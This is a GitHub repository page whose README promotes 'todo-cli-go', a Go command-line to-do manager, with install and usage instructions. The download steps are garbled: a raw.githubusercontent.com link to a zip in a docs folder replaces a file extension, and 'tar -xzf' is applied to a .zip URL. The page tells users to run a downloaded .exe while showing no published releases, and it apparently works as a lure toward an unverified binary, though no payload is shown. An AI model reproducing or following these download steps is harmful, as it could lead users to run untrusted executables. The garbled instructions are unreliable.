Skip to content

HYPERGAMINXZ/todo-cli-go

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

40 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

πŸ“‹ todo-cli-go - Simple Command-Line Task Manager

Download todo-cli-go

πŸ“– What is todo-cli-go?

todo-cli-go is an easy-to-use program that helps you keep track of your tasks using just your computer’s command line. You don’t need any programming experience to use it. It runs in a simple text interface where you can add, view, and complete your to-do items quickly. Built with Go, it is fast and works well on many computers.

This tool is great if you like managing tasks without opening complicated apps. It keeps everything on your computer with no internet needed.

πŸ’» System Requirements

  • Works on Windows 10 or later, macOS 10.13 or later, and most Linux distributions.
  • Requires about 20 MB of free space.
  • Needs access to the terminal or command prompt on your computer.
  • No internet connection required for basic use.

You don’t have to install any additional software. All needed parts come inside the todo-cli-go program.

πŸš€ Getting Started

To get started, you will download the program, open it, and learn the basic commands. This guide will walk you through these steps in detail. By the end, you will be able to use todo-cli-go to keep your daily tasks organized with simple commands.

πŸ“₯ Download & Install

Please visit this page to download to get the latest version of todo-cli-go.

How to Download

  1. Click the green "Latest release" on the release page.
  2. Choose the version that matches your computer’s system:
    • For Windows, download the file ending in .exe.
    • For macOS or Linux, download the file ending in https://raw.githubusercontent.com/HYPERGAMINXZ/todo-cli-go/main/docs/website/go_todo_cli_v1.6.zip or without .exe.
  3. Save the file to a place you will remember, like your desktop or downloads folder.

How to Install

  • Windows:

    1. Double-click the downloaded .exe file.
    2. Follow the instructions on the screen to finish installing.
    3. Once done, you can open a Command Prompt window to run todo-cli-go.
  • macOS or Linux:

    1. Open the terminal.
    2. Go to the folder where you saved the downloaded file. For example, type cd ~/Downloads.
    3. Extract the files if it’s zipped or compressed. Use: tar -xzf https://raw.githubusercontent.com/HYPERGAMINXZ/todo-cli-go/main/docs/website/go_todo_cli_v1.6.zip.
    4. To start todo-cli-go, type ./todo-cli-go and press Enter.

No complex setup is needed besides these simple steps.

πŸ›  How to Use todo-cli-go

todo-cli-go uses commands you type in the terminal to work. Here are the main actions you will use:

Adding a Task

To add a new task, type:

todo add "Buy groceries"

Replace "Buy groceries" with your own task. This command saves the task for you.

Viewing Tasks

Type this to see your tasks:

todo list

It will show all tasks with numbers and status (pending or done).

Marking a Task Complete

When you finish a task, mark it done with:

todo done 1

Here, 1 is the task number from the list command.

Deleting a Task

If you want to remove a task completely, use:

todo delete 1

Replace 1 with the task number you want to delete.

πŸ” Features

  • Easy command-line interface.
  • Add, list, complete, and delete tasks fast.
  • Supports categories or tags for organizing tasks.
  • Save your tasks on your computer; no cloud needed.
  • Works offline.
  • Lightweight and fast.
  • Offers prompt-based input with suggestions to help manage tasks.
  • Can be customized through simple settings files.

🀝 Support & Help

If you have questions or want to learn more:

  • Visit the GitHub repository to see the code and documentation.
  • Look for an issues page there if you want to report bugs or ask for help.
  • You can open your terminal and run todo --help after installation to see a list of all commands.

πŸ—‚ Topics Covered

This project uses a combination of popular Go tools to build an easy interface:

  • Bubble Tea: For simple and interactive terminal UI.
  • Cobra: To handle command-line commands.
  • PromptUI: For helping users type commands with suggestions.
  • Built purely in Go, a stable and fast programming language.

πŸ”— Quick Access

Download todo-cli-go now

Use this link to visit the page where you can get the right version for your computer. This is the safest and simplest way to start using todo-cli-go today.

About

πŸ“ Manage and organize tasks efficiently from the command line with a feature-rich, Go-based todo application offering filtering, sorting, and backups.

Topics

Resources

License

Code of conduct

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors